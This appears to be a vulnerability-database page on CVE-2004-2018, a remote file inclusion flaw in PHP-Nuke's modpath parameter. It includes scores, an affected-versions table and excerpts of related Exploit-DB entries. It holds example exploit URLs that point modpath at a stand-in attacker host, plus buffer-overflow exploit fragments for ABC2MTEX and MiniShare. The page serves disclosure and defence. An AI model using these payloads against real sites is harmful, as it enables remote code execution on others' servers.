CVE-2004-2018
published 2004-12-31CVE-2004-2018: PHP remote file inclusion vulnerability in index.php in Php-Nuke 6.x through 7.3 allows remote attackers to execute arbitrary PHP code by modifying the modpath…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.78%
88.6th percentile
PHP remote file inclusion vulnerability in index.php in Php-Nuke 6.x through 7.3 allows remote attackers to execute arbitrary PHP code by modifying the modpath parameter to reference a URL on a remote web server that contains the code.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ABC2MTEX 1.6.1 - Command Line Stack Overflow
exploitdb·2019-08-14·CVSS 10.0
CVE-2004-1257 [CRITICAL] ABC2MTEX 1.6.1 - Command Line Stack Overflow
ABC2MTEX 1.6.1 - Command Line Stack Overflow
---
Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
Date: 2019-08-13
Exploit Author: Carter Yagemann
Vendor Homepage: https://abcnotation.com/abc2mtex/
Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
Version: 1.6.1
Tested on: Debian Buster
An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
address from the openIn function by providing a long input filename. This
carries similar risk to CVE-2004-1257.
Setup:
$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
$ tar -xzf abc2mtex1.6.1.tar.gz
$ make
$ gcc --version
gcc (Debian 8.3.0-6) 8.3.0
Copyright (C) 2018 Free Software Foundation, Inc.
This is free
Exploit-DB
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
exploitdb·2018-12-18·CVSS 7.5
CVE-2018-19862 [HIGH] MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
---
Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
methods are also vulnerable. The difference is minimal, both are exploited
in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length
EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII
"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
HTTP/1.1
"
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
Exploit-DB
PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion
exploitdb·2004-05-17
CVE-2004-2018 PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion
PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion
---
source: https://www.securityfocus.com/bid/10365/info
PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing aribtrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter.
If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.
http://www.example.com/nuke73/index.php?modpath=ftp://attacker.com/directory/
http://www.example.com/nuke73/index.php?modpath=//attacker_ip/share_name/
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2004-05/0870.htmlhttp://marc.info/?l=bugtraq&m=108482888621896&w=2http://secunia.com/advisories/11625http://www.osvdb.org/6222http://www.securityfocus.com/bid/10365http://www.waraxe.us/index.php?modname=sa&id=29https://exchange.xforce.ibmcloud.com/vulnerabilities/16218http://archives.neohapsis.com/archives/fulldisclosure/2004-05/0870.htmlhttp://marc.info/?l=bugtraq&m=108482888621896&w=2http://secunia.com/advisories/11625http://www.osvdb.org/6222http://www.securityfocus.com/bid/10365http://www.waraxe.us/index.php?modname=sa&id=29https://exchange.xforce.ibmcloud.com/vulnerabilities/16218
2004-12-31
Published